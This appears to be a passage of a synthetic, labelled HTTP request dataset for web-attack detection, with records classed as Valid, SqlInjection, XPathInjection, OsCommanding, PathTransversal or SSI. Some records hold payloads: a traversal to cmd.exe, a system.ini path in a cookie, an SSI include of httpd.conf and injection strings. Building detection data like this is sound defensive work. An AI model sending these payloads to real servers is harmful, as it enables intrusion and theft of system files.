UA-OS: Linux
UA-Color: color8
UA-Pixels: 0464x327
Via: 5.5 120.26.172.133
Transfer-Encoding: gzip
Upgrade: srsd/2.9, nNisSb/2.9, eTj/8.9
Warning: 694 75.28.35.212 "sieenweirr1p" 
X-Forwarded-For: 101.164.70.181
X-Serial-Number: 3741240593504860
----: -------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 45126
Start - Id: 44036
class: OsCommanding
GET /samples/..��..��..��..��..��../winnt/system32/cmd.exe?/c+ HTTP/1.0
Host: 8.135.180.194
Connection: close
Accept: audio/x-wav, image/png;q=0.8
Accept-Charset: windows-1252;q=0.2
Accept-Encoding: deflate;q=0.3, deflate
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 217.40.88.176
Cookie: 31j=3912269;lis3b8d=eu;ktgh5nt=scu
Cookie2: $Version="0"
Date: Wed, 17 Jan 07 14:18:14 CET
ETag: "ayOvlW22Ihp5_7In"
Expect: ehwes=nuc4cz
From: fasutm@u0PGri.cz
If-Modified-Since: Mon, 18 May 09 08:41:20 GMT
If-Unmodified-Since: Sat, 11 Apr 09 15:14:41 UTC
If-Match: "PZ6__oUsmE0h6nd4D"
If-None-Match: "hcu2HQJwzIw8snN"
If-Range: Sun, 09 Aug 09 11:15:26 GMT
Max-Forwards: 898
MIME-Version: 0.2
Pragma: sshs0Asd=htn8Ot
Proxy-Authorization: iyeh60 zesgho=4zre
Authorization: Digest response="74b14Bd658AABAFabDFa0d4eF9c24bA4"
Range: 67-764741,470518-20,3-202913
Referer: http://www.Ihyetir.com/6ttle/a7setO/ekeodb.cgi
TE: trailers,trailers,trailers
Trailer: Accept
User-Agent: aRbrinGwaw/4.0.9.0.7
UA-CPU: PowerPC
UA-Disp: 6819,8710,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 4697x9146
Via: HTTP/6.9 14.89.228.227:412, hta/0.0 www.sere.shtml:0694
Transfer-Encoding: nraOo
Upgrade: Eaxve/8.7, yk0s/2.8
Warning: 003 www.easrIe.js "dEiywrccwaehsomosn" "Sun, 28 Mar 04 08:37:49 UTC"
X-Forwarded-For: 55.100.34.25
X-Serial-Number: 204643043550
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44036
Start - Id: 35842
class: XPathInjection
GET /rwdZutnsnTta3c8E0oh/-LA/eY9-E/1UIfromAiHmJPrDCH/dxjHfB80q3.html?neonnr4gtws=WE&tu=c2s&npS5d=lWXg_hcEW&tnn1meedeT=nne&tqvdns=ws%5Dhcucos&sfe=tip&a7j=oEee3ea%27+or++count%28++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28++++i+++%2B++j++%2B+++k+++%2Bl++%2B+1%29%5D+++++%7C+++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++or+++%27httsse%27++++%3D+%27++++3Leatoi7%27++or HTTP/1.1
Host: 84.101.15.165:80
Connection: keep-alive
Accept: */*
Accept-Charset: utf-8, windows-1254;q=0.1, x-mac-hebrew, isiri-3342;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: scn='ootdTa'
Client-ip: 48.181.108.67
Cookie: rtbhesl=et2irxr2hgsmew7hMX;sk=l 5a);hyeSoe='uce o nEre;hs9tnma=r?c@;iAughsa=4;ea=akW@57JLwM
Cookie2: $Version="003"
Date: Wed, 01 Dec 04 24:41:15 GMT
ETag: W/"3mul.SL-AHP5nCjiu"
Expect: sc2nG
From: eAhiWa@3utA.st
If-Modified-Since: Tue, 15 Dec 09 22:43:48 CET
If-Unmodified-Since: Fri, 10 Feb 06 12:04:11 UTC
If-Match: *
If-None-Match: "Q.FWvqyKcZ9A1-P0qGi"
If-Range: *
Max-Forwards: 885
MIME-Version: 8.2
Pragma: Nr='jxxc'
Proxy-Authorization: do1ee dtreee=is8turnl
Authorization: Digest username="4dg6s4u"
Range: 77-,-9
Referer: /ayR2sbs/cybalrwt/7ahnreoz/iGnhi/sao0Pft.bin
TE: chunked,deflate;q=0.7
Trailer: Connection
User-Agent: iPDCjqGU http://www.koai.uk
UA-CPU: PowerPC
UA-Disp: 747,476,16
UA-OS: FreeBSD
UA-Pixels: 4135x5853
Via: 9.0 www.rrm6etit.jpg
Transfer-Encoding: compress
Upgrade: ml1/5.5, VeaAtn/8.1, thmg/1.6, lbedtw/3.5
Warning: 327 215.134.162.135 "tumeaatn0ePv5noa" "Fri, 09 Dec 05 05:29:32 UTC"
X-Forwarded-For: 43.11.206.228
X-Serial-Number: 4375504120
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35842
Start - Id: 41980
class: SqlInjection
GET /toP9E0fRTexecWApC2/ae@eR18oGtZ1NY/ReA_/p-VLs/aRvBNOIWrBAJ/e36t2S-WoiFqSQugdnzB/tp1oloi.exe?ngotbdR=ashutdownrbenj&o5dzr6O5sbsTtml=cr7ee&7EvMseis=170+or+++id%3E0+++or+ls_id%3C0808863&jaweqceflit9tt=eithca&rnaenhhs=steEos4wirnneWe&mt=iettwrst5rhfi&trieA9Zy=owiaoA3zteossjet&oannIr=30656&uRnneraxp=205096 HTTP/1.1
Host: www.sntihadeh.gov
Connection: dtr4nv
Accept: image/jpeg;q=0.4, image/jpeg, application/x-tar
Accept-Charset: hz-gb-2312;q=0.4, iso-2022-kr, iso-8859-5;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 138.9.3.13
Cookie: nisd8enca=pcrl;yth3hn1maee=vre
Cookie2: $Version="316"
Date: Sat, 24 Apr 04 10:47:49 GMT
ETag: "H-wtGNRWTakDfVw7"
Expect: taus=aiyn
From: Iyirabt@mar7tEeeb7.de
If-Modified-Since: Mon, 24 Nov 08 05:30:00 GMT
If-Unmodified-Since: Wed, 10 May 06 16:20:19 UTC
If-Match: *
If-None-Match: "vwge@FysRj3zYHz"
If-Range: Sat, 25 Sep 04 13:40:58 GMT
Max-Forwards: 389
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Digest uri=http://Ih9gc.net/soss.txt
Authorization: Basic ZWE0aHo6cm44ZmllMXY=
Range: -221064
Referer: http://www.rcpocimb.org/missocr/n6ddst8u/yod3/hhkl/zicvo33.html
TE: gzip,trailers,trailers
Trailer: If-Range
User-Agent: fAIaNhw/0.7.8.8.9
UA-CPU: Sparc
UA-Disp: 4298,556,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 8709x899
Via: 6ucKLt/1.7 www.betno.jpeg, FTP/6.9 219.111.145.75
Transfer-Encoding: compress
Upgrade: bohu/8.8, mugnol/1.7, b8rt/2.6
Warning: 119 141.109.167.27 "sebrw" 
X-Forwarded-For: 88.3.128.18
X-Serial-Number: 772384141
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41980
Start - Id: 27903
class: Valid
GET /taRaaaXt5ttrPeetuc/no3EJinEeRksjtuus/aerl3ttAchtymph/CdlaedoRetEtSs9s/i8qKB.mdb?dMOJryeF5=xas%28%40&uaeameEj6s=0&elH94IautoexecP76P2=63781&pMchildGK8DtVR20=2wanrthtntfrneitt&htaccesOmIx=beoth&3tscQow=formh0&miEwsra=neihioe&MFkUmP_=776111&el1s5isae6t=6&rswadtonemyirEe=eHm4QTz9_QfL&hato0qaacLnufum=nSber0siei&tmrar3Rnzya9S=l9dnyyabreyu8ns&esldrtesstteid9=vn-t&SYHldR=%3Cctge%5Dt3hn8mc&tle=uTyeQNorp. HTTP/1.0
Host: 147.28.174.97
Connection: close
Accept: audio/*, video/*;q=0.0, image/png
Accept-Charset: *;q=0.2
Accept-Encoding: deflate;q=0.5, deflate;q=0.5, compress, compress;q=0.5
Accept-Language: u5ctciw-qtnlg4;q=0.2, ywslakf-usxge;q=0.1
Cache-Control: no-cache
Client-ip: 217.171.87.254
Cookie: ahesgT1di1ny=89782154;ky4J8SCobjectincludee4=198997;s2kUtEariTn=xp_c systemshutdown;z1roleeesCor=7f84QQ;avNX=14
Cookie2: $Version="6"
Date: Mon, 02 Nov 09 19:53:14 CET
ETag: "XncvKXDgiEVJXFsZFPyv"
Expect: 7rwrf
From: ksaefm@Ittg.fr
If-Modified-Since: Mon, 18 Aug 08 11:01:57 GMT
If-Unmodified-Since: Sun, 22 Aug 04 10:43:33 CET
If-Match: "ffUT8dbuQeuL6ym4Nyf"
If-None-Match: "COa4oj1a0s3jH4yDq6d"
If-Range: *
Max-Forwards: 191
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: Digest username="tI16oce"
Authorization: NTLM dGlzYmdndXJlc2F0ZW9saXJ3bnlpYnJkaXhVeGRidG9zczRxaGlzQTIxaHJhbw==
Range: 6-04307,08-
Referer: /qbinQua.zip
TE: trailers
Trailer: Accept-Encoding
User-Agent: smetH/0.7
UA-CPU: Sparc
UA-Disp: 3738,726,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 869x220
Via: HTTP/1.3 244.220.140.237, 7.4 www.aIusl9e.css
Transfer-Encoding: compress
Upgrade: set0s1/4.2, y0tTe/1.1, kaxgt/4.9, 7lzo/0.2
Warning: 691 www.sindzeae.jpg:0 "9mntxonwreh" "Thu, 27 May 04 12:00:03 GMT"
X-Forwarded-For: 141.34.54.32
X-Serial-Number: 7257164
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27903
Start - Id: 46018
class: PathTransversal
POST /70sijBIPns-F/5nifzA4ies584ashe/vusnoUerohmesn/yH_/3SGin7bowZ/-9R3Q-7zO.itk/PcThbTpaG/eehDitytbt1ah9m/nmrdnhrbxu/Q-gIo4HH/NRqseton1nsn.cfm? HTTP/1.1
Content-Length: 192
Content-Language: n5,tEid
Content-Encoding: gzip
Content-Location: http://dern.com/attwtreb/umle.mp3
Content-MD5: a2FBbml0YXRpaTlwdXlpcA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 08 Mar 09 21:43:40 GMT
Last-Modified: Sat, 16 May 09 01:30:42 CET
Host: 255.104.139.43
Connection: keep-alive
Accept: audio/x-wav, audio/*;q=0.6
Accept-Charset: windows-1258, x-mac-roman;q=0.7, cp-950;q=0.9, euc-kr;q=0.4, x-mac-arabic
Accept-Encoding: 
Accept-Language: t-ta, 1ewac-o5Ietlcz, 3srWe9rr-g8vtoh
Cache-Control: min-fresh=94
Client-ip: 239.20.242.198
Cookie: 9EEC7WUka_=..\..\..\..\WINNT\system.ini;s09GRhome1inputHBec=ldoqvcnt;ietw2=rc1ns;3vDdelete_7X-LW=0totconnect;8sm=950240601
Cookie2: $Version="64"
Date: Sun, 24 Aug 08 06:46:09 UTC
ETag: "s3.67goCxJnDPXRrF"
Expect: 4ireasm
From: yoznEjr@sreR4E9e.de
If-Modified-Since: Sun, 10 Jan 10 05:42:14 GMT
If-Unmodified-Since: Sun, 08 Jul 07 20:31:09 UTC
If-Match: *
If-None-Match: "OpmsweVI-V2yOf2-"
If-Range: *
Max-Forwards: 3153
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Reui iOuai=meriTAeb
Authorization: Basic dGh5U2tjSWY6d2V5bm5s
Referer: /ojei/0xpsCw0/etMcs8u/Iarahbe/13bano5a.cgi
TE: chunked;q=0.9,trailers,trailers
Trailer: TE
User-Agent: lwwkap65o
UA-CPU: PowerPC
UA-Disp: 804,1046,32
UA-Color: color16
Via: 3.4 181.227.78.208, nimnay/2.4 www.sli9r.js
Transfer-Encoding: deflate
Upgrade: aWs/0.3, iSSmun/1.8, 5ve9e/7.2, dkn/7.0, ticd3/0.5
Warning: 599 30.235.235.40 "getmtuo6ihGwpta" "Wed, 15 Feb 06 23:17:06 GMT"
X-Forwarded-For: 213.134.189.62
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

eptaloifqaH=665&6B-E3MkPlog3G=nt&eseeaibssst=rstr&6SnK4HRki=t&r6rrbkoeK=ptzr&os8J1uhTne=ERmfeuf&na=tennulle|tjhn1&Rxbgsound1NUxQtmpe=295077&qs7tphditbrNtn=e_UG8o2&nfsj=lon&prh5elOh=921241114

End - Id: 46018
Start - Id: 9662
class: Valid
GET /9Hwdptglkgatrsrepa/3mmPn5YeytkyLNp.E8y/xD4PiTrp93CK85/dsbzln2mlewnjwoer/bevalerhtacces2Wya73Qxml/odoaioeletmos5b.js?z_k%uH=%5B%3B+lw&.A_hYBtyscriptJupdateE=vug&oonnijeqaanns=ca&h6eM=f4dJh6H.l&uBttixedr=74&XYbinBtY4rZI=%24cefromEpfed&eHtr6eiMe7p6Aes=bxAWEvoQVYx&nlehjsbig=t93J_T&Bwp-v.4Tr=20609&dth0=8u9mti&qsnlmEofniu=2739676&Iaccept1myGXO@=akobject&Odf5=9593781 HTTP/1.1
Host: www.ITwprRSrai.net:53
Connection: close
Accept: video/*;q=0.0, audio/*;q=0.5
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 22.60.12.210
Cookie: orariixehs=55822546
Cookie2: $Version="545"
Date: Thu, 25 Nov 04 08:24:31 GMT
ETag: W/"zmPPMPAV0GmH3iQyvjqw"
Expect: 100-continue
From: ar6lncde@ohw9srxe.uk
If-Modified-Since: Tue, 27 May 08 06:16:56 GMT
If-Unmodified-Since: Tue, 22 Jan 08 15:12:59 CET
If-Match: *
If-None-Match: "xTwwSc6w.NcavkgU66m8"
If-Range: "Y5LP9NE-UDLZNUD.m"
Max-Forwards: 4
MIME-Version: 2.1
Pragma: jtaomG7=heNn
Proxy-Authorization: ni3esO o9oc=rheoabn
Authorization: doeoR sdtl=L1dee
Range: 7-
Referer: /She9m/5dVigbs6.png
TE: gzip
Trailer: Date
User-Agent: vTemrmmaurlyhaeNi3e
UA-CPU: StrongARM
UA-Disp: 0833,784,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 7210x634
Via: FTP/5.7 203.145.236.94, 9.7 www.xgakr.jpg
Transfer-Encoding: wici
Upgrade: or9lsg/2.8, ussc/2.9, rAae/9.5, oIerot/2.9, iues/2.1
Warning: 821 www.f4tipnoj.jpeg:21799 "pyfo4" 
X-Forwarded-For: 48.192.127.27
X-Serial-Number: 048488269920
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9662
Start - Id: 1627
class: Valid
GET /t4g/wlMz-Y.shtml?gehztflia=stcsaoZoaeTre&xu=rsaT&OWfphpr5VjztuW=oEZzP&het8n=huha&a6layO1=ott%27lieee2qo&pTEc8yaed3na=nuUM&Asesg1cn=tt7cc4nCiretTboho0&sp=gYzGUnoLc4&nmahRhjteqMse=eEeeabwxeDlrfcnaf&tlunayt1ae=e_Kta&mtAnfelbts9r=549279&nteTEtsatvec=sqPcwaehwtnUssuy&etoedlrdi6tjet=ihisr&3iTooneue8=%3Fibs9%28httpf0gl8nc&otxnsnJgMetrrle=5 HTTP/1.0
Host: www.eaed7amae.st
Connection: keep-alive
Accept: image/*
Accept-Charset: x-mac-arabic
Accept-Encoding: 
Accept-Language: rsd-e
Cache-Control: nmgevv='oxug'
Client-ip: 246.17.128.127
Cookie: 4telnetkqQ6a=ealsodiv;otsOsendenfaove=aayNtechoacceptys ;5adOkui5osswyh=zrrp)a
Cookie2: $Version="28"
Date: Sun, 20 Jul 08 08:34:28 GMT
ETag: W/"CuGxCSQMyn_oqwuxRj"
Expect: 100-continue
From: S6tD@nser.com
If-Modified-Since: Tue, 09 Oct 07 14:11:59 UTC
If-Unmodified-Since: Sat, 20 Nov 04 21:40:23 CET
If-Match: "X1-p37u-Zao4-RpPrOo"
If-None-Match: "AdL06_oeUq6k_A5vD"
If-Range: "HOrT3SlqySbmdgFxbQ"
Max-Forwards: 761
MIME-Version: 7.4
Pragma: 2TTo=re
Proxy-Authorization: i2vGen celiyy=ey4ea
Authorization: Digest cnonce="rte8"
Range: 39456-
Referer: /ni6i0/Ebnpnla.sh
TE: trailers,gzip;q=0.1
Trailer: Accept-Charset
User-Agent: Mozilla/5.7 (X11; U; SunOS sun4u 1.4; tU-pn; rv:5.2.6) Gecko/17339238
UA-CPU: MIPS
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 7605x6639
Via: t59ya/1.6 113.210.105.133
Transfer-Encoding: identity
Upgrade: ecl/4.8, rwegte/0.2, hr1m/6.0, yeanc/4.6
Warning: 152 71.253.87.10 "ioeasIse0a2llba" "Sat, 14 Apr 07 22:40:19 CET"
X-Forwarded-For: 111.79.187.206
X-Serial-Number: 9219304
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1627
Start - Id: 16211
class: Valid
GET /4bZY/aq/eckx4dfd/LiaiSsir/abuhhtbea.asmx? HTTP/1.0
Host: 22.116.191.78
Connection: Ivenie
Accept: */*;q=0.9
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: fzOuasCe-t, sioonv-6aa;q=0.2
Cache-Control: Fipenit='ceadraxy'
Client-ip: 203.244.202.178
Cookie: Ine9bsn=55543565;NM=eautoexecnrntn@lw
Cookie2: $Version="205"
Date: Mon, 04 Sep 06 14:14:56 UTC
ETag: W/"@SJXhmTT2SU4I70"
Expect: alfo
From: oltae@ieknifNr4.org
If-Modified-Since: Sun, 24 Jan 10 12:15:06 GMT
If-Unmodified-Since: Wed, 19 Aug 09 18:43:19 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 19 Dec 05 03:02:33 GMT
Max-Forwards: 9774
MIME-Version: 9.8
Pragma: 3Irifw=yMcM
Proxy-Authorization: Digest username="nEaw"
Authorization: Basic dWVENmRWZmk6YXdyMw==
Range: 5711-,60-
Referer: http://tpt4.cz/lmrfe4a/Fnui4qc5/rchplc.sh
TE: chunked;q=0.8
Trailer: Max-Forwards
User-Agent: Mozilla/9.5 (X11; U; Solaris 0.3; o7-us; rv:3.2.4) Gecko/05130602
UA-CPU: PowerPC
UA-Disp: 202,714,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 7316x082
Via: w7tao/7.2 www.oaoe7Of.tiff
Transfer-Encoding: gzip
Upgrade: tnl/8.4, hvmlz/2.3, sn2fh/0.4, tEir/3.1, eEcar/0.7
Warning: 562 www.72rhlemd.png "OanfqmoOtceaolig" 
X-Forwarded-For: 113.16.19.192
X-Serial-Number: 1816915028
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16211
Start - Id: 30719
class: Valid
GET /PKMmochanSBXXCFG/Nuk6snef/aB73wx_Za_Ud/a8hn_wQ7LlQQZm0Fz/epJjS4vP/YcOgdxN/a1LKQnyOsPMgFuS2FQ-M.mspx?peHPHnAnybt=c&j1V8varn=tn_-jJ0K&elAcfdo=4e&nrsdi=0aa&qtr=m%29yt8ati&eeiisell=c-1A29FLb HTTP/1.0
Host: www.yi1N.net
Connection: pis8s6
Accept: video/mpeg;q=0.0
Accept-Charset: *;q=0.5
Accept-Encoding: identity
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 244.110.126.88
Cookie: 4s7etyg=DLaes jSin; aa:Per;rhe1EguinqOT=LtatI;T3shutdownCE=vbscriptotojlphphtaccesbYqCdd3l letc;ufeoA=048;oeTsOo=s12JN;Iaoriug=81Wsrr566n
Cookie2: $Version="36"
Date: Thu, 20 May 04 03:05:42 GMT
ETag: W/"gS3YkbZ8GuNG4me_"
Expect: 100-continue
From: dubt@tmrdi.net
If-Modified-Since: Tue, 06 Dec 05 14:02:01 UTC
If-Unmodified-Since: Sat, 26 Jan 08 17:49:09 GMT
If-Match: "KkICL16N8TbIKC1"
If-None-Match: "cKKlW4@wLi7708TeEk1"
If-Range: Mon, 29 Jan 07 22:50:14 CET
Max-Forwards: 5
MIME-Version: 7.4
Pragma: murwnch=hyeae
Proxy-Authorization: uwea ht18Lnh=tnrantuh
Authorization: Basic TmV0ZWVTc046ZGloc2F0
Range: 17470-
Referer: /eosa/huiaHa/sloeNe/duwnr.swf
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/6.9 (Machintosh; U; Mac OS X 4.9; pa-8D; rv:7.2.1) Gecko/90296826
UA-CPU: x86
UA-Disp: 802,001,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 2445x5903
Via: FTP/8.0 www.asaa.html:4, 3.2 www.uMeexU.png, 4.3 123.162.68.197
Transfer-Encoding: deflate
Upgrade: Fit/6.5, aensa/6.6
Warning: 405 www.SrEc7tiu.shtml "upku" 
X-Forwarded-For: 78.5.245.10
X-Serial-Number: 925559378
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30719
Start - Id: 30924
class: Valid
GET /iQdVYl_EaTJ9fZY/eDstertelsdi6tuit/_havingidnJ3bMuoRE/Yt4dineh0nwt/jtyeiez7a8vhlkhtmmg/ei7sa/terltpcoaixpApsoelz/lA/u8rydEmsaul6ds/deFGyBR6Oy@RK/oQ76KEglhU96hl/gcan5nddtIawa.php? HTTP/1.1
Host: 232.28.228.233
Connection: close
Accept: application/x-tar, application/*, video/*
Accept-Charset: *;q=0.6
Accept-Encoding: identity;q=0.8, gzip, identity;q=0.9, gzip
Accept-Language: hPk-B8;q=0.5
Cache-Control: only-if-cached
Client-ip: 237.192.101.254
Cookie: ryoaees8rsa7=1;iFBzl='nh;hj=4plZ25;hmniedebed=221613;dD3hSrtiaaoah=h8re
Cookie2: $Version="301"
Date: Fri, 22 Jun 07 09:30:05 CET
ETag: W/"nVuwNmxr9TNDf-.rQVPL"
Expect: 100-continue
From: eSAnM@ahoeenfee.biz
If-Modified-Since: Sun, 20 Feb 05 16:33:16 CET
If-Unmodified-Since: Sat, 24 Dec 05 11:00:48 CET
If-Match: *
If-None-Match: *
If-Range: "TvXUzCLzjVDq8cYM"
Max-Forwards: 489
MIME-Version: 5.0
Pragma: Teti='avyAn'
Proxy-Authorization: Zw7ltl irs7a=wat2Do
Authorization: Basic aFR5RTFpaDpIODVjbGU=
Range: 8929-,26-
Referer: http://www.hblthS.st/tuenlj/6tInntna.nsf
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/6.6 (compatible; MSIE 9.2; WinNT; kinst)
UA-CPU: MIPS
UA-Disp: 0407,7003,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 1031x1153
Via: 1.8 www.Eforetso.js:7
Transfer-Encoding: identity
Upgrade: A2lari/6.5, teu/8.0, nttot/3.7, errra/9.4, eaUpm/9.6
Warning: 528 150.223.116.32 "eiib2tvfathrBNuolv" 
X-Forwarded-For: 93.207.235.159
X-Serial-Number: 535265474092814212
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30924
Start - Id: 21260
class: Valid
GET /thriE_I9Rq4xzwaNFeY/2efnxsclt/o1/vO0ahL0Zv/sew.6IAkRcV6VWeB_A/nyicaarmoSotduwtpeEm/lT8uRtq5eKJZekdM6/rst3ahieb5Kotfs1ct/s9vj4nJZbPQ/m1Gzr@.php3?vtUoileanksdvu=4sdosnO&winHberdfplqiu=d2hjhZnqecsteR&91nfno=0734485542&cis3lR6osnT3=iqBnate&aWm1Aeut2eaoehd=83418&qseobIeReRs3ti=rpiOoRasqli&tt=8220 HTTP/1.1
Host: www.o5MIaslf.it
Connection: close
Accept: text/xml;q=0.9, video/*, video/*;q=0.8
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 133.200.177.186
Cookie: ou=ulraWbB7;u9otaoP=7729;F9ott3diseand=t@eOhutyaab i~Tiz;gUaoensblldOfb=894088141;sryo8oegapnxi=orwa
Cookie2: $Version="9"
Date: Wed, 02 Jan 08 16:15:30 GMT
ETag: "UTD9tx@ti8Rf3y-68"
Expect: 100-continue
From: aEie@aeme1v.biz
If-Modified-Since: Thu, 23 Nov 06 11:17:39 CET
If-Unmodified-Since: Sun, 11 Jan 04 19:53:56 GMT
If-Match: *
If-None-Match: "BN50VXNqOuniFcnG3J"
If-Range: *
Max-Forwards: 923
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: Digest username="ounet"
Authorization: Digest response="fc1A176a98c3BDe9BCF8f6F90C1BD322"
Range: 793-,8602-038713,9-
Referer: http://www.sEktDnl.gov/piSii/ecsnyri.wav
TE: trailers
Trailer: Date
User-Agent: tskOvAecr/0.0.9.7
UA-CPU: PowerPC
UA-Disp: 664,7142,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 8293x354
Via: 9.0 www.rybpurtr.css:5, 2.3 www.neddt8iE.gif
Transfer-Encoding: gzip
Upgrade: yyiKl/3.7, it7/7.9, ehn/2.1
Warning: 469 180.84.229.18 "oEiemdthie3uEjrey" "Sun, 17 Dec 06 24:08:21 CET"
X-Forwarded-For: 185.82.248.52
X-Serial-Number: 900444
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 21260
Start - Id: 39539
class: SSI
PUT /hu.av/eb0GlUCOjX/iRtssioniv/rnehn8ni7amx2/sE1.5h40tT-Kql3dRoc/o1E4lwtLtttt50a/t1Iybeoe/4ameh8feyarEKcweesa/jc4QlXii/b8/tle1Rr58gacanlh0Ha.pl? HTTP/1.1
Content-Length: 336
Content-Language: DrdtO,raniy10,e3
Content-Encoding: gzip
Content-Location: /32u2r/ihegdept/haned/SPim/h2proteq.nsf
Content-MD5: ZXRZbmVhMG9tb3RyOHNubQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 07 Jan 06 12:10:21 CET
Last-Modified: Thu, 07 Feb 08 20:18:17 CET
Host: www.naoaagittd.org
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: zcsgbr-tit9tec, sirhfsE-rdf;q=0.7, hyolsu-ittple
Cache-Control: min-fresh=064
Client-ip: 94.165.84.44
Cookie: oienetgeNcA=9009;nonsteerihg=trnfov/d1eid|osl ;netcatXvbscriptRM2U.-=eFBix7A5p@;eflitd5mosgHU=8132176017;viseurat=sp9ebrOtseibnwehs
Cookie2: $Version="126"
Date: Tue, 23 Mar 04 01:58:50 CET
If-Modified-Since: Tue, 27 Jan 09 12:01:10 UTC
If-Unmodified-Since: Mon, 25 Jan 10 06:10:34 UTC
If-Match: *
If-None-Match: *
Max-Forwards: 8
MIME-Version: 5.2
Proxy-Authorization: Basic Vm5zcmFwOjI2aWtvc2Q=
Authorization: Basic aG1sZXQ6dG9uYXRM
Referer: http://0Mtn.cz/uiaeivtw/h0to.bin
TE: trailers,gzip;q=0.9
Trailer: Host
User-Agent: Mozilla/1.9 (Machintosh; U; Mac OS X 7.2; ti-Et; rv:0.7.6) Gecko/06246059
Via: 4.6 30.51.168.160, 7.8 www.cditnos.htm:214
Transfer-Encoding: i1ia7; rbihc=fhaN9o
Upgrade: ibhi3u/4.0, tAAin/1.9, ofae/4.1, dojnr/5.2
Warning: 494 189.159.212.31 "fthMulr0sla" 
----: ----------

uliilSrf=7Qz_y9HbJeJx&KuRyqKstNwp-=mi0n1ij&LUqoDh=bi45u&ritfaedrIon=<!--#include  virtual="/etc/httpd/httpd.conf"   -->&n0sr=i B &eySy=uwp-nodez>connectemy3wtzRih&iamHgg=e&4ovo0l5yiAuIii=jZQHW1FH&ac4zIN8uoHius=7&elodmr7eNt=fyAnD e7&semaajojz=nsc&YkjerQ=s&clTesgepyhd=69eunhlesd&Ri6ceoa=7nyKpGmtSKcX&cunorgn86yebe=h

End - Id: 39539
Start - Id: 3494
class: Valid
GET /eHAqnPcXarD-MN5KtAFi/no61u6pctatenaecacai/dt283hFwtc/k@ixR6yNE_qN/xetmst7a/yyCksL12hKvQ4-jao/stryeonlHqns/de2h/rRJJTsock_streamdetcqUx/wOQ2b3/om1OiAaAwNenr/zsrl5.htm?xEl8tptds0rdga=edZbnIX&di=6lyaotin6%29group+bytC2os&hehsoe2r=72070&Toe=twjBWJ&ohrYinr8alrtall=sRBMw%40&9.UA=nph-r4+p%7C0zits%3COtlems&utrtPN=zoi&mtpa0=DGdhph&Rf9tM=me05Vy&aetwTaodstrob=ie&_b8d=6&rr7erogosoh=6203&rd0yotno4ej=2qV&Sselecto_-XtJF=arlaanIsdmtdp&w4ysussti=762831 HTTP/1.0
Host: www.bngled.ch
Connection: close
Accept: */*
Accept-Charset: ks_c_5601-1987
Accept-Encoding: *
Accept-Language: aiib-cnvH;q=0.4
Cache-Control: min-fresh=9
Client-ip: 247.57.253.1
Cookie: trltTr7lrreox=vsxn7eh;Tbetweenioptkscriptr=7;3xlt0trbtihfe=40439;ItSOeooe=oelaoa$+s
Cookie2: $Version="62"
Date: Wed, 24 Mar 10 24:14:22 GMT
ETag: W/"TaJ66g7u_LVS2h9cC"
Expect: 100-continue
From: uxKbis@erSpeat.org
If-Modified-Since: Fri, 16 Jan 09 20:30:17 CET
If-Unmodified-Since: Tue, 30 Sep 08 01:30:02 UTC
If-Match: "f11mKkeK3w_UB3S8"
If-None-Match: *
If-Range: Sat, 16 Jul 05 11:29:46 GMT
Max-Forwards: 25
MIME-Version: 0.0
Pragma: toza9='wpOm8slk'
Proxy-Authorization: Digest algorithm=MD5
Authorization: Basic M293bjpzamFzaGU=
Range: 2754-,-42,333635-
Referer: http://hezeiuf.ch/rrfHy7/Ntha4/qriko/iiSf.html
TE: trailers
Trailer: If-Modified-Since
